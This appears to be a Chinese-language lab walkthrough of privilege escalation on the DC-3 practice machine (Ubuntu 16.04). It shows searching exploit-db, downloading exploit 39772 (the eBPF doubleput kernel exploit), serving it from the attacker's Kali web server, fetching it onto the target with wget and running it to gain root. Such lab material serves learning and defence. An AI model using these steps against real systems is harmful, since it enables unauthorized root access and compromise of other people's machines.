Ubuntu 16.04提权

Ubuntu 16.04提权

实验环境:DC-3靶机

搜索一下相关的漏洞利用脚本

┌──(rootkali)-[~]
└─# searchsploit ubuntu 16.04

Ubuntu 16.04提权_第1张图片

这里选用一个 4.4.x 相对通用的提权方式(Privilege Escalation表示提权)。

路径在linux/local/39772.txt,即/usr/share/exploitdb/exploits/linux/local/39772.txt

文本写的是漏洞产生的原因、描述和漏洞利用的方法,还附上了exp,就是最后一行的链接。
Ubuntu 16.04提权_第2张图片
Ubuntu 16.04提权_第3张图片

地址如下:

Proof of Concept: 
https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552

Exploit-DB Mirror: 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

使用wget下载,出现404。

┌──(rootkali)-[~]
└─# wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

在这里插入图片描述

经查询,换到了一个新的地址:https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/tree/main/bin-sploits

┌──(rootkali)-[~]
└─# wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

Ubuntu 16.04提权_第4张图片

解压文件
Ubuntu 16.04提权_第5张图片

根据前面/usr/share/exploitdb/exploits/linux/local/39772.txt文件中提到的使用方式进行操作。

Ubuntu 16.04提权_第6张图片

需要将exploit.tar上传到目标主机,并解压运行~

kali启动http服务,将exploit.tar文件复制到网站根目录。

┌──(rootkali)-[~]
└─# systemctl restart apache2                              
                                                                                                          
┌──(rootkali)-[~]
└─# cp 39772/exploit.tar /var/www/html

在这里插入图片描述

在目标机器上使用wget进行下载

www-data@DC-3:/var/www/html/templates/protostar$ wget http://192.168.10.146/exploit.tar

Ubuntu 16.04提权_第7张图片

解压exploit.tar文件
Ubuntu 16.04提权_第8张图片

进入解压出来的目录

www-data@DC-3:/var/www/html/templates/protostar$ cd ebpf_mapfd_doubleput_exploit/

并按照39772.txt文件中的方式进行操作。

</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./compile.sh
</templates/protostar/ebpf_mapfd_doubleput_exploit$ ./doubleput

Ubuntu 16.04提权_第9张图片

已经获取到了root权限。

你可能感兴趣的:(提权,Privilege,Escalation,ubuntu,linux,提权,安全,Linux内核)